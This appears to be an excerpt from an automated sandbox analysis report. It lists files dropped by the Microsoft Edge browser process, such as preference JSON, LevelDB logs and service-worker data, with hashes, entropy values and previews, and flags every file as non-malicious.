                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                      MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                      SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                      SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                      SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4kdpOsd+aFvrE9klcK84bV+F4HQA0U9PwYJ:st4QOsd+CDLbGYQKL
                                                                                                                                                                                                                                                                                                      MD5:AF9A00328A42A2381608832B7207BE40
                                                                                                                                                                                                                                                                                                      SHA1:2B76070CD54CFD74449FE07A0B856A819183CDF7
                                                                                                                                                                                                                                                                                                      SHA-256:5D5E16778A8A905B0D611A9EABF0A4D50B6C3D8D8B5994CB40795190E1929DA6
                                                                                                                                                                                                                                                                                                      SHA-512:0C0BDA0BB20773CB98529C8D7B8AF3852005415EA569D9B22739DD428D56205CCDCC15726B730A6A08D0CA7E689681AF61B4512CE2763B200F624EF994EE8C97
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4kdpOsd+aFvrE9klcK84bV+F4HQA0U9PwYJ:st4QOsd+CDLbGYQKL
                                                                                                                                                                                                                                                                                                      MD5:AF9A00328A42A2381608832B7207BE40
                                                                                                                                                                                                                                                                                                      SHA1:2B76070CD54CFD74449FE07A0B856A819183CDF7
                                                                                                                                                                                                                                                                                                      SHA-256:5D5E16778A8A905B0D611A9EABF0A4D50B6C3D8D8B5994CB40795190E1929DA6
                                                                                                                                                                                                                                                                                                      SHA-512:0C0BDA0BB20773CB98529C8D7B8AF3852005415EA569D9B22739DD428D56205CCDCC15726B730A6A08D0CA7E689681AF61B4512CE2763B200F624EF994EE8C97
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.567736491219251
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:8ANR90WFBW5wk2f4wnn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP62IoVL5rwXSpStW:8Wf0kBWak2fRnnu1jazc5KDtW
                                                                                                                                                                                                                                                                                                      MD5:A5083282B24199954FD36BBF017BB304
                                                                                                                                                                                                                                                                                                      SHA1:D95953ADE61F6932DF94B2C294AC8F42FFF72166
                                                                                                                                                                                                                                                                                                      SHA-256:7D7B00171B24B49031D938A6D1D20064C097993532CDCDEC247ECA1D3494B38A
                                                                                                                                                                                                                                                                                                      SHA-512:7BF3CCA36EFEC3D92F3A8EE31589C6C95F6D716F54688EFB087B7AEBC75A56A4FC531BC0BB1831B0B9A8F9BB1478BAAAEBDFA709163A11238BF2D478DD7D0482
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379444096550407","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379444096550407","location":5,"ma
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2394
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.820030550025573
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:F2xc5NmfBcncmoDCRORpllg2hEBfRHHldCRORpllg2h6d+PFCRORpllg2hEMRHHq:F2emSMrd6BfBRrdod+nrd6MBvCrdyBc
                                                                                                                                                                                                                                                                                                      MD5:BFF08BA0D7D1E116C1D8526E77CE0203
                                                                                                                                                                                                                                                                                                      SHA1:51DB95E441C10158FA1680E95BFF9D0EE61F2340
                                                                                                                                                                                                                                                                                                      SHA-256:D23AD1C373344625E9218A5B06F6D1C5C4E0BBC3C682392A758A16626EE93608
                                                                                                                                                                                                                                                                                                      SHA-512:90533074D401B6929FE73745615F04D0F8E31981AB80E9C1FF62B2864232FB794F10B4C21CD09EF4C1578EEA5692435AA7F8E369EDCEA522951F542FC0702EEF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..+..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):303
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0941377815747115
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xwQZes1N723oH+TcwtE/a252KLlb2MM+q2PN723oH+TcwtE/a2ZIFUv:xlZJaYeb8xLp2N+vVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                      MD5:46AF853CFD628828276133D53540EA51
                                                                                                                                                                                                                                                                                                      SHA1:1FDD9673CD9676F8D41612DDC561DBDC5298938B
                                                                                                                                                                                                                                                                                                      SHA-256:5598D3AE2B47C69E39AC12557E95109F11B0A36D55D0AEFB7825CBF234DB8948
                                                                                                                                                                                                                                                                                                      SHA-512:F09D9C52C126447E28F7FC1766CEF69E3FE075DA771A43B79A439DF0B7B01479B649117A83512647C9338EF34CD7930424F3BB2404AFAF4F0FAA3D35A961FD06
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:12.835 13ac Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/23-11:15:12.852 13ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):114579
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.580423533140749
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekEM8l:J9LyxPXfOxr1lMe1nL/5L/TXE6n7d2
                                                                                                                                                                                                                                                                                                      MD5:86A0484A575FE1A383EFF3784A522331
                                                                                                                                                                                                                                                                                                      SHA1:2D42A951494B5AD6851BB4CD777F03FBE5B1CBFA
                                                                                                                                                                                                                                                                                                      SHA-256:C62A6635BE5451A7A8B42931582386B645E97FFD9CE16A8E57B305EB58CF8F24
                                                                                                                                                                                                                                                                                                      SHA-512:C913132A5F4F427B1C73844DED5D8D70AAFF21A4511EA90013211CE397B61A281A9400051CC7944361659F9B061B39D98FA699C9F0D67556198DCF78FCBAA7C5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):189105
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.387346522796816
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:A31DE1D1Qnwe9qUp/b4HL/B2TwD0vMsc2GZ2OhUlBL/:wnweLp/ML/4s3se+/
                                                                                                                                                                                                                                                                                                      MD5:6A180000A347621290893E39313B582B
                                                                                                                                                                                                                                                                                                      SHA1:EDAA780D7ABC7FB987F84B214475FC03193777E8
                                                                                                                                                                                                                                                                                                      SHA-256:A0FDA6BC9A8596E84643739E55C3529EF884BC99C76FB5F6A77CCB72F1D295D3
                                                                                                                                                                                                                                                                                                      SHA-512:662944FA33A9CD42556E1F9009D59D6E5CACC2F2E93EE9E9C4F508A03B922701D4862089205BFB03F46064B186D0E11A43EDAC26C0D14A29DAF9D6E8A77DA732
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):24
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                      MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                      SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                      SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                      SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:0\r..m..................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:J70XAyXl/lYV/lxEstllQ89iln:t0QKYWs+89G
                                                                                                                                                                                                                                                                                                      MD5:FB3C96D4C105FB3565F392FC8E2AC4E2
                                                                                                                                                                                                                                                                                                      SHA1:B243E50A1545B1E0F1790D87326F44B98D27D2D0
                                                                                                                                                                                                                                                                                                      SHA-256:B2FEFFE79C98C49F781171B4B45EE8F6A4B1FA9FB6A047885C317614AD557EE3
                                                                                                                                                                                                                                                                                                      SHA-512:B526C612CD6BFFE35F5CC61A18F282F2275CB4B53BB557C59341491154278DD8E66F0D386B69FFDE2BE454A1ED7CD93F1CA2ECB8E1752AC53F566FA72FD19E5F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...<..oy retne.........................X....,................+...../.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:J70XAyXl/lYV/lxEstllQ89iln:t0QKYWs+89G
                                                                                                                                                                                                                                                                                                      MD5:FB3C96D4C105FB3565F392FC8E2AC4E2
                                                                                                                                                                                                                                                                                                      SHA1:B243E50A1545B1E0F1790D87326F44B98D27D2D0
                                                                                                                                                                                                                                                                                                      SHA-256:B2FEFFE79C98C49F781171B4B45EE8F6A4B1FA9FB6A047885C317614AD557EE3
                                                                                                                                                                                                                                                                                                      SHA-512:B526C612CD6BFFE35F5CC61A18F282F2275CB4B53BB557C59341491154278DD8E66F0D386B69FFDE2BE454A1ED7CD93F1CA2ECB8E1752AC53F566FA72FD19E5F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...<..oy retne.........................X....,................+...../.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):72
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5376346459829513
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:J70XAyXl/lYV/lxEstllQ89iln:t0QKYWs+89G
                                                                                                                                                                                                                                                                                                      MD5:FB3C96D4C105FB3565F392FC8E2AC4E2
                                                                                                                                                                                                                                                                                                      SHA1:B243E50A1545B1E0F1790D87326F44B98D27D2D0
                                                                                                                                                                                                                                                                                                      SHA-256:B2FEFFE79C98C49F781171B4B45EE8F6A4B1FA9FB6A047885C317614AD557EE3
                                                                                                                                                                                                                                                                                                      SHA-512:B526C612CD6BFFE35F5CC61A18F282F2275CB4B53BB557C59341491154278DD8E66F0D386B69FFDE2BE454A1ED7CD93F1CA2ECB8E1752AC53F566FA72FD19E5F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:@...<..oy retne.........................X....,................+...../.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):7673
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.3735971647289937
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:X6n78mYhpIyhai0vU+5YPm1U9X3+MKikLl9iSr/ShiYWOtM:K4mYhpHhaioU9X3+TBLl9iSr63WOtM
                                                                                                                                                                                                                                                                                                      MD5:85D4013414EB0259ED26E8A427D49C44
                                                                                                                                                                                                                                                                                                      SHA1:CFB09412516F3326B511464FF24A5388EB0F102D
                                                                                                                                                                                                                                                                                                      SHA-256:F8DDBDF2B1579E54226DFE0C0EE0928344CF3898F2B3F453C680DEF6EDF423C2
                                                                                                                                                                                                                                                                                                      SHA-512:9A2A6ADB62E99BD7F503A7F0B8C3525724BAE741FC6C21805FEEAE14E4D9A43283D785FBE868BF216A4FA06BE1418CEF7779F0197F81C4CB98570B1F6F787549
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................hGLb................next-map-id.1.Cnamespace-972c3832_33b7_4265_90b1_f278fa5b6c01-https://ntp.msn.com/.0.K..................map-0-shd_sweeper.9{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.p.r.g.-.h.p.-.h.a.s.p.o.l.l.,.p.r.g.-.1.s.w.-.c.n.h.o.r.o.-.c.,.p.r.g.-.e.c.p.s.b.h.v.,.a.d.s.-.c.f.v.4.,.p.r.g.-.m.s.n.-.g.l.s.b.i.d.m.,.b.i.n.g._.v.2._.s.c.o.p.e.,.p.r.g.-.1.s.w.-.s.a.b.g.t.a.s.k.t.h.r.o.t.c.,.p.r.g.-.1.s.w.-.s.a.g.e.e.x.p.c.,.p.r.g.-.1.s.w.-.s.a.-.u.i.e.n.i.c.h.e.t.5.b.,.p.r.g.-.1.s.w.-.s.a.-.w.e.b.r.v.s.c.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.c.c.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.146060351411069
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOvq2PN723oH+TcwtrQMxIFUt8sOeYZmw+sOeUkwON723oH+TcwtrQMFLJ:xUvVaYebCFUt8s+/+sm5OaYebtJ
                                                                                                                                                                                                                                                                                                      MD5:C3CBEEE5CCEBC5CD190251C8B4E97399
                                                                                                                                                                                                                                                                                                      SHA1:4B208745EC76DD2C02CFEA7ABCABF39F2C96625F
                                                                                                                                                                                                                                                                                                      SHA-256:4FCAFBF3FB6ABF25A2472499CE08334DAACF5F6FFDDE5672E25FCB9CF7826F71
                                                                                                                                                                                                                                                                                                      SHA-512:8BAC6ABD16D2682FEC467D6B13927A4EF522E1AE67B4FED559D4E56513BD799D6567E5CBE3CC69227B53C8EBDD6676C1B653F2AA9CEA49CD644372E854231006
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.549 640 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/23-11:14:57.623 640 Recovering log #3.2024/12/23-11:14:57.627 640 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1443
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.8229941715192526
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:3oln41QgeRZPnwpsAF4unxmtLp3X2amEtG1ChqMglYSmA6fQKkOAM4:3o941QgoPnwzFYLp2FEkChFgHmA64HOp
                                                                                                                                                                                                                                                                                                      MD5:7828D31D66589762EBB1B4BAABA77ABD
                                                                                                                                                                                                                                                                                                      SHA1:50A45403CB66C4A5EEC8333864EC8ADCE683FEA0
                                                                                                                                                                                                                                                                                                      SHA-256:D19600C0B3A53D3C3F71B754D999E80384D38A62E45E5F59868ACFC6CC9512B0
                                                                                                                                                                                                                                                                                                      SHA-512:988925679980B99CA6D04B13445AC4B8C36A7374F3680126E15D0C6A77C209F836C6B8D89E388EBC84E73B2CFE771896D051030416D622795D1293A6854202DB
                                                                                                                                                                                                                                                                                                      Malicious:false
